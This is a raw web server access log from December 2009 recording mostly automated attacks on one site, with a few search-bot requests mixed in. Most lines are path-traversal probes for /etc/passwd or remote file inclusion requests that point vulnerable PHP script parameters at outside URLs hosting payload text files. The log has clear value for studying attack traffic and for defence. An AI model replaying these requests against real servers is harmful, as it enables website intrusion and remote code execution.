93.184.79.59 - - [02/Dec/2009:01:22:25 -0800] "GET /index.php?redir=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
202.131.226.52 - - [02/Dec/2009:01:27:25 -0800] "GET /logs/access_090501.log%20%20//skin/zero_vote/error.php?dir=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.96.221.5 - - [02/Dec/2009:01:32:33 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
66.96.221.5 - - [02/Dec/2009:01:32:33 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
67.195.112.187 - - [02/Dec/2009:01:42:22 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.107.182 - - [02/Dec/2009:02:07:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.107.182 - - [02/Dec/2009:02:08:56 -0800] "GET /pr02.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
83.209.46.197 - - [02/Dec/2009:02:28:31 -0800] "GET /index.php?redir=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
83.209.46.197 - - [02/Dec/2009:02:28:32 -0800] "GET /index.php?redir=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:29 -0800] "GET /errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:29 -0800] "GET /logs/access_090329.log/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:29 -0800] "GET /logs/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:43 -0800] "GET /errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:43 -0800] "GET /logs/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:43 -0800] "GET /logs/access_090329.log/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:55 -0800] "GET /logs/access_090329.log/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:55 -0800] "GET /logs/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:55 -0800] "GET /errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:58 -0800] "GET /errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:58 -0800] "GET /logs/access_090329.log/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:30:58 -0800] "GET /logs/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:13 -0800] "GET /logs/access_090329.log/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:13 -0800] "GET /logs/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:13 -0800] "GET /errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:23 -0800] "GET /errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:24 -0800] "GET /logs/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:24 -0800] "GET /logs/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:24 -0800] "GET /logs/access_090329.log/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:24 -0800] "GET /errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:02:31:27 -0800] "GET /logs/access_090329.log/errors.php?error=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
93.184.79.59 - - [02/Dec/2009:02:35:43 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
93.184.79.59 - - [02/Dec/2009:02:35:43 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
209.97.212.185 - - [02/Dec/2009:02:39:24 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://d10770259.serv126.ixwebhosting.com//blocks/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.97.212.185 - - [02/Dec/2009:02:39:24 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://d10770259.serv126.ixwebhosting.com//blocks/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.97.212.185 - - [02/Dec/2009:02:39:24 -0800] "GET /logs/access_090731.log//skin/happycast_category_lightblack/login.php?dir=http://d10770259.serv126.ixwebhosting.com//blocks/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
66.96.221.5 - - [02/Dec/2009:02:46:31 -0800] "GET /index.php?redir=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
66.96.221.5 - - [02/Dec/2009:02:46:31 -0800] "GET /index.php?redir=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
213.136.32.137 - - [02/Dec/2009:02:54:20 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
213.136.32.137 - - [02/Dec/2009:02:54:20 -0800] "GET /photoalb/lib/static/header.php?set_menu=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
87.250.230.32 - - [02/Dec/2009:03:00:38 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
211.255.23.47 - - [02/Dec/2009:03:01:04 -0800] "GET /logs/access_090731.log///skin/happycast_category_lightblack/setup.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:03:01:04 -0800] "GET /logs///skin/happycast_category_lightblack/setup.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:03:01:04 -0800] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:03:01:10 -0800] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:03:01:10 -0800] "GET /logs/access_090731.log///skin/happycast_category_lightblack/setup.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:03:01:10 -0800] "GET /logs///skin/happycast_category_lightblack/setup.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:03:12:26 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:03:12:26 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:03:12:26 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:03:13:17 -0800] "GET /logs/scripts.log//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:18:30 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:18:30 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:18:35 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 3520 "-" "Mozilla/5.0" "wirama.com"
65.55.207.119 - - [02/Dec/2009:03:18:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:18:48 -0800] "GET /logs/access_090501.log/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:18:49 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:18:49 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 3520 "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:18:52 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.45.167.247 - - [02/Dec/2009:03:19:03 -0800] "GET /logs/access_090501.log/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.119 - - [02/Dec/2009:03:30:54 -0800] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.234.106.119 - - [02/Dec/2009:03:33:24 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://1000.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.234.106.119 - - [02/Dec/2009:03:33:24 -0800] "GET /logs/access.log//skin/happycast_category_lightblack/login.php?dir=http://1000.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.234.106.119 - - [02/Dec/2009:03:33:24 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://1000.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.234.106.119 - - [02/Dec/2009:03:33:33 -0800] "GET /skin/happycast_category_lightblack/login.php?dir=http://1000.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.234.106.119 - - [02/Dec/2009:03:33:33 -0800] "GET /logs/access.log//skin/happycast_category_lightblack/login.php?dir=http://1000.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.234.106.119 - - [02/Dec/2009:03:33:33 -0800] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://1000.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [02/Dec/2009:03:45:53 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [02/Dec/2009:03:45:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [02/Dec/2009:03:45:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zebedees-castles.co.uk/wp-content/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.58.139.68 - - [02/Dec/2009:03:49:16 -0800] "GET /logs/access_090801.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://ying.fileave.com/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:03:49:16 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://ying.fileave.com/1.txt? HTTP/1.1" 200 3520 "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:03:49:16 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ying.fileave.com/1.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:03:50:37 -0800] "GET /logs/access_090801.log/////?_SERVER[DOCUMENT_ROOT]=http://ying.fileave.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:03:50:37 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ying.fileave.com/1.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:03:50:37 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://ying.fileave.com/1.txt? HTTP/1.1" 200 3520 "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:54 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:54 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:54 -0800] "GET /logs/access_090801.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:57 -0800] "GET /logs/access_090801.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:57 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:58 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 3520 "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:59 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 3520 "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:59 -0800] "GET /logs/access_090801.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:52:59 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 200 918 "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:53:07 -0800] "GET /logs/access_090801.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:53:08 -0800] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.45.167.247 - - [02/Dec/2009:03:53:08 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.dwno.or.kr//bbs/data/pds06/azka.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
83.209.46.197 - - [02/Dec/2009:03:53:33 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
83.209.46.197 - - [02/Dec/2009:03:53:33 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
124.217.242.210 - - [02/Dec/2009:03:56:42 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:03:56:42 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:03:56:42 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:03:59:47 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:03:59:47 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:03:59:48 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:04:02:48 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:04:02:48 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.217.242.210 - - [02/Dec/2009:04:02:48 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://imperadocmd.fileave.com/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:04:37 -0800] "GET /include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:04:37 -0800] "GET /logs/access.log//include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:04:37 -0800] "GET /logs//include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:04:42 -0800] "GET /logs/access.log//include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:04:42 -0800] "GET /logs//include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:04:42 -0800] "GET /include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:05:37 -0800] "GET /logs/access_090701.log//include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
93.184.79.59 - - [02/Dec/2009:04:05:39 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
93.184.79.59 - - [02/Dec/2009:04:05:39 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
211.255.23.47 - - [02/Dec/2009:04:06:28 -0800] "GET /logs/access_090701.log//include/print_category.php?setup[use_alllist]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:04:08:29 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:04:08:29 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [02/Dec/2009:04:08:29 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.58.139.68 - - [02/Dec/2009:04:11:35 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://ying.fileave.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:04:11:35 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ying.fileave.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:04:11:35 -0800] "GET /logs/access_090329.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://ying.fileave.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.58.139.68 - - [02/Dec/2009:04:14:00 -0800] "GET /logs/access_090329.log//components/com_simpleboard/image_upload.php?sbp=http://ying.fileave.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.139 - - [02/Dec/2009:04:33:46 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
202.229.132.2 - - [02/Dec/2009:04:38:49 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.229.132.2 - - [02/Dec/2009:04:38:49 -0800] "GET /include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.229.132.2 - - [02/Dec/2009:04:38:49 -0800] "GET /logs/access_090501.log%20%20//include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.229.132.2 - - [02/Dec/2009:04:42:42 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:04:42:42 -0800] "GET /logs/access_090731.log//include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:04:42:42 -0800] "GET /include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:04:42:51 -0800] "GET /logs/access_090601.log//include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.229.132.2 - - [02/Dec/2009:04:42:52 -0800] "GET /logs/access_090801.log%20%20//include/mail.inc.php?skin_board_path=http://j0e2.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [02/Dec/2009:05:04:09 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:05:04:09 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
